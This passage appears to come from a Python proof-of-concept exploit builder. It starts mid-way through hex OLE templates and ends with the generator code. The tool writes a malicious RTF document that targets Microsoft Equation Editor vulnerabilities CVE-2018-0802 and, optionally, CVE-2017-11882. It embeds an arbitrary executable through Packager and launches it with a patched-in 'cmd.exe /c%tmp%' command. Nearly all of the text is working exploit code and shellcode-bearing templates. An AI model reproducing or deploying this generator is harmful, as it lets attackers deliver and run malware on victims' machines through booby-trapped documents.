FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFF04000000FEFFFFFF05 000000FEFFFFFFFEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E0074007200790000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000016000500FFFFFFFFFFFFFFFF0200000002CE020000000000C0000000000000460000000000 00000000000000B024837CC473D30103000000C00300000000000001004F006C0065000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000A000201FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000 0000000000000000000000000000000000000000000000000000001400000000000000010043006F 006D0070004F0062006A000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000120002010100000004000000FFFFFFFF0000000000 00000000000000000000000000000000000000000000000000000000000000010000006600000000 00000003004F0062006A0049006E0066006F00000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000012000201FFFFFFFFFFFFFFFFFF FFFFFF00000000000000000000000000000000000000000000000000000000000000000000000003 0000000600000000000000FEFFFFFF02000000FEFFFFFFFEFFFFFF05000000060000000700000008 00000009000000FEFFFFFFFEFFFFFF0C0000000D0000000E000000FEFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFF01000002000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000100FEFF030A0000FFFFFFFF02 CE020000000000C000000000000046170000004D6963726F736F6674204571756174696F6E20332E 30000C0000004453204571756174696F6E000B0000004571756174696F6E2E3300F439B271000000 00000000000000000000000000000000000000000000000000000000000000000000000000030004 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000FFFFFFFF030000000400000001000000FFFFFFFF01 000000000000007C010000040100003C0100000100090000039E00000002001C0000000000050000 0009020000000005000000020101000000050000000102FFFFFF00050000002E0118000000050000 000B0200000000050000000C02A00160021200000026060F001A00FFFFFFFF000010000000C0FFFF FFC6FFFFFF20020000660100000B00000026060F000C004D61746854797065000020001C000000FB 0280FE0000000000009001000000000402001054696D6573204E657720526F6D616E00FEFFFFFF5F 2D0A6500000A0000000000040000002D01000009000000320A6001100003000000202002004F006C 00650050007200650073003000300030000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000180002000300000005000000FFFFFFFF0000000000 00000000000000000000000000000000000000000000000000000000000000040000007E01000000 0000005200690063006800450064006900740046006C006100670073000000000000000000000000 0000000000000000000000000000000000000000000000000000001C000201FFFFFFFF06000000FF FFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000A 0000000C000000000000004500710075006100740069006F006E0020004E00610074006900760065 000000000000000000000000000000000000000000000000000000000000000000000020000200FF FFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000 000000000000000B000000C500000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000020000A00000026060F000A00FF FFFFFF0100000000001C000000FB021000070000000000BC02000000000102022253797374656D00 0048008A0100000A000600000048008A01FFFFFFFF6CE21800040000002D01010004000000F00100 000300000000000000000000000000000000000000000000004E414E490000000000000100000000 00000001000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000001C00000002009EC4A900000000000000C8A75C00C4 EE5B0000000000030100030A0A08000133C0508D44245250EB7F2020202020202020202020202020 20202020202020202020202020202020202020202020202020202020202020202020202020202020 20202020202020202020202020202020202020202020202020202020202020202020202020202020 202020202020202020202020202020202020202020202020202020202020202026908B44242C662D 51A8FFE0250000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000001050000050000000D0000004D45544146494C4550 494354007C010000FCFEFFFF4401000008007C01040100000100090000039E00000002001C000000 00000500000009020000000005000000020101000000050000000102FFFFFF00050000002E011800 0000050000000B0200000000050000000C02A00160021200000026060F001A00FFFFFFFF00001000 0000C0FFFFFFC6FFFFFF20020000660100000B00000026060F000C004D6174685479706500002000 1C000000FB0280FE0000000000009001000000000402001054696D6573204E657720526F6D616E00 FEFFFFFF5F2D0A6500000A0000000000040000002D01000009000000320A60011000030000002020 20000A00000026060F000A00FFFFFFFF0100000000001C000000FB021000070000000000BC020000 00000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF6CE218000400 00002D01010004000000F0010000030000000000 """ OBJDATA_TEMPLATE_11882 = R""" 01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1 b11ae1000000000000000000000000000000003e000300feff090006000000000000000000000001 0000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffe fffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0074007200790000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000 000000000000008020cea5613cd30103000000000200000000000001004f006c0065000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000a000201ffffffffffffffffffffffff00000000000000000000000000 0000000000000000000000000000000000000000000000000000001400000000000000010043006f 006d0070004f0062006a000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000120002010100000003000000ffffffff0000000000 00000000000000000000000000000000000000000000000000000000000000010000006600000000 00000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000012000201ffffffff04000000ff ffffff00000000000000000000000000000000000000000000000000000000000000000000000003 0000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000fe ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffff01000002080000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000100feff030a0000ffffffff02 ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e 30000c0000004453204571756174696f6e000b0000004571756174696f6e2e3300f439b271000000 00000000000000000000000000000000000000000000000000000000000000000000000000030004 00000000000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000001c00000002009ec4a900000000000000c8a75c00c4 ee5b0000000000030101030a0a01085a5a4141414141414141414141414141414141414141414141 414141414141414141414141414141414141414141120c4300000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000004500710075 006100740069006f006e0020004e0061007400690076006500000000000000000000000000000000 0000000000000000000000000000000000000020000200ffffffffffffffffffffffff0000000000 0000000000000000000000000000000000000000000000000000000000000004000000c500000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000ffffffffffffffffff ffffff00000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000000000ff ffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000ffffffffffffffffffffffff000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000001050000050000000d0000004d 45544146494c4550494354003421000035feffff9201000008003421cb010000010009000003c500 000002001c00000000000500000009020000000005000000020101000000050000000102ffffff00 050000002e0118000000050000000b0200000000050000000c02a001201e1200000026060f001a00 ffffffff000010000000c0ffffffc6ffffffe01d0000660100000b00000026060f000c004d617468 54797065000020001c000000fb0280fe0000000000009001000000000402001054696d6573204e65 7720526f6d616e00feffffff6b2c0a0700000a0000000000040000002d0100000c000000320a6001 90160a000000313131313131313131310c000000320a6001100f0a00000031313131313131313131 0c000000320a600190070a000000313131313131313131310c000000320a600110000a0000003131 31313131313131310a00000026060f000a00ffffffff0100000000001c000000fb02100007000000 0000bc02000000000102022253797374656d000048008a0100000a000600000048008a01ffffffff 7cef1800040000002d01010004000000f0010000030000000000 """ def create_ole_exec_primitive(command, objdata_template, command_offset, max_len): if len(command) > max_len: raise ValueError("primitive command must be shorter than %d bytes" % max_len) hex_command = command.ljust(max_len).encode("hex") objdata_hex_stream = objdata_template.translate(None, "\r\n") ole_data = objdata_hex_stream[:command_offset] + hex_command + objdata_hex_stream[command_offset + len(hex_command):] return OBJECT_HEADER + ole_data + OBJECT_TRAILER def create_rtf(header, trailer, executable, double): # CVE-2018-0802 exploit ole1 = create_ole_exec_primitive("cmd.exe /c%tmp%\\{}".format(os.path.basename(executable)), OBJDATA_TEMPLATE_0802, (0xd12*2), 126) p = Package(executable) package = p.build_package() outbuf = header + package + ole1 if double: # CVE-2017-11882 exploit outbuf += create_ole_exec_primitive("cmd.exe /c%tmp%\\{}".format(os.path.basename(executable)), OBJDATA_TEMPLATE_11882, (0x949*2), 43) return outbuf + trailer if __name__ == '__main__': parser = argparse.ArgumentParser(description="PoC for CVE-2018-0802 using Packager.dll file drop method") parser.add_argument("-e", "--executable", help="File to ebmed and exec", required=True) parser.add_argument('-o', "--output", help="Output exploit rtf", required=True) parser.add_argument('-d', "--double", help="Double-whammy! Exploits both CVE-2018-0802 and CVE-2017-11882 in the same document.", action="store_true") args = parser.parse_args() with open(args.output, 'w') as f: f.write(create_rtf(RTF_HEADER, RTF_TRAILER, args.executable, args.double)) print "[+] Completed!"